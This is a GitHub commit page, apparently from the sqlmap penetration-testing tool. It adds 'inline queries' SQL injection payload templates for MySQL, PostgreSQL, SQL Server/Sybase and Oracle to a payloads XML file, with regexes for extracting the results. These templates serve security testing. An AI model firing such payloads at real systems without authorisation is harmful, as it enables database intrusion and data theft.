Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit ab31603

Browse files
stamparmstamparm
committed
Implementation of payloads for Issue #122 
1 parent 231f0f7 commit ab31603

1 file changed

Lines changed: 81 additions & 1 deletion

File tree

xml/payloads.xml

Lines changed: 81 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -73,7 +73,7 @@ Tag: <test>
7373
Valid values:
7474
0: Heuristic check to parse response errors
7575
1: Boolean-based blind SQL injection
76-
2: Error-based SQL injection
76+
2: Error-based/Inline queries SQL injection
7777
3: UNION query SQL injection
7878
4: Stacked queries SQL injection
7979
5: Time-based blind SQL injection
@@ -1898,6 +1898,86 @@ Formats:
18981898
<!-- End of error-based tests - GROUP BY and ORDER BY clauses -->
18991899

19001900

1901+
<!-- Inline queries tests -->
1902+
<test>
1903+
<title>MySQL inline queries</title>
1904+
<stype>2</stype>
1905+
<level>5</level>
1906+
<risk>1</risk>
1907+
<clause>1,2,3,8</clause>
1908+
<where>3</where>
1909+
<vector>(SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
1910+
<request>
1911+
<payload>(SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>
1912+
</request>
1913+
<response>
1914+
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
1915+
</response>
1916+
<details>
1917+
<dbms>MySQL</dbms>
1918+
</details>
1919+
</test>
1920+
1921+
<test>
1922+
<title>PostgreSQL inline queries</title>
1923+
<stype>2</stype>
1924+
<level>5</level>
1925+
<risk>1</risk>
1926+
<clause>1,2,3,8</clause>
1927+
<where>3</where>
1928+
<vector>(SELECT '[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]')</vector>
1929+
<request>
1930+
<payload>(SELECT '[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]')</payload>
1931+
</request>
1932+
<response>
1933+
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
1934+
</response>
1935+
<details>
1936+
<dbms>PostgreSQL</dbms>
1937+
</details>
1938+
</test>
1939+
1940+
<test>
1941+
<title>Microsoft SQL Server/Sybase inline queries</title>
1942+
<stype>2</stype>
1943+
<level>5</level>
1944+
<risk>1</risk>
1945+
<clause>1,2,3,8</clause>
1946+
<where>3</where>
1947+
<vector>(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')</vector>
1948+
<request>
1949+
<payload>(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')</payload>
1950+
</request>
1951+
<response>
1952+
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
1953+
</response>
1954+
<details>
1955+
<dbms>Microsoft SQL Server</dbms>
1956+
<dbms>Sybase</dbms>
1957+
<os>Windows</os>
1958+
</details>
1959+
</test>
1960+
1961+
<test>
1962+
<title>Oracle inline queries</title>
1963+
<stype>2</stype>
1964+
<level>5</level>
1965+
<risk>1</risk>
1966+
<clause>1,2,3,8</clause>
1967+
<where>3</where>
1968+
<vector>(SELECT ('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') FROM DUAL)</vector>
1969+
<request>
1970+
<payload>(SELECT '[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]' FROM DUAL)</payload>
1971+
</request>
1972+
<response>
1973+
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
1974+
</response>
1975+
<details>
1976+
<dbms>Oracle</dbms>
1977+
</details>
1978+
</test>
1979+
<!-- End of inline queries tests -->
1980+
19011981
<!-- Stacked queries tests -->
19021982
<test>
19031983
<title>MySQL &gt; 5.0.11 stacked queries</title>

0 commit comments

Comments
 (0)